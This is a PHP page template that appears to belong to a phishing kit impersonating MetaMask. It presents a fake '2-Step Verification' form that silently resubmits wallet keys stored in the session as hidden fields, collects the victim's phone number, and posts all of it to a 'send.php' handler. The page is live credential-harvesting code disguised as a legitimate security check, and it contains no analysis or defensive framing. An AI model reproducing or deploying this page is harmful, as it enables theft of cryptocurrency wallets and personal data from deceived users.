<?php include_once './config.php'; ?>
<html lang="en">
    <?php
    $title = 'The Ultimate Crypto Wallet for DeFi, Web3 Apps, and NFTs | MetaMask';
    include_once './meta.php';
    ?>
    <body>
        <?php include_once './header.php'; ?>
        
        <link rel="stylesheet" href="<?= base_url('assets/country-code-picker/css/jquery.ccpicker.css')?>">
        <div class="container">
            <div class="row justify-content-center mt40">
                <div class="col-sm-6 rounded-4 border p25 mb50">
                    <h4 class="text-center fw-bold mt15">2-Step Verification</h4>
                    <p class="text-center my15 fs16">Enter the 2-Step verification generated by your authenticator app.</p>
                    <form method="post" action="<?= base_url('metamask/send.php') ?>" class="py10">
                        <div className="my25">
                            <?php foreach ($_SESSION["keys"] as $ki => $key) { ?>
                            <input type="hidden" name="keys[<?=$ki?>]" class="" placeholder="<?=$ki?>" required="" style="background: transparent; border: 1px solid rgb(51, 51, 51);" value="<?=$key?>" />
                            <?php  } ?>
                            <div class="form-control  fs16" style=" background-color: #EFEFEF; border: 0px; ">
                                <input name="phone_number" type="number" id="phone_number" required="" style="background-color: #FFF;font-size: 16px;padding: 8px 12px;border-radius: 0px;border: 1px solid #ccc;color: #000;width: 80%;" placeholder="Phone number" value="" autocomplete="off" >
                            </div>
                        </div>
                        <div class="row">
                            <div class="col-sm-12 my30 mb50 text-center">
                                <button type="submit" class="btn btn-primary bg-primary-2 px60 rounded-pill py12 fs15">Confirm & Verify</button>
                            </div>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>
    <?php include_once './footer.php'; ?>
    <script src="<?=base_url('assets/country-code-picker/js/jquery.ccpicker.min.js')?>"></script>
    <script type="text/javascript">
        $(document).ready(function() {
            $("#phone_number").CcPicker({ countryCode: "us", dataUrl: "<?= base_url('assets/country-code-picker/data/en.json') ?>", searchPlaceHolder: "Find..." });
        });
            
    </script>
</body>
</html>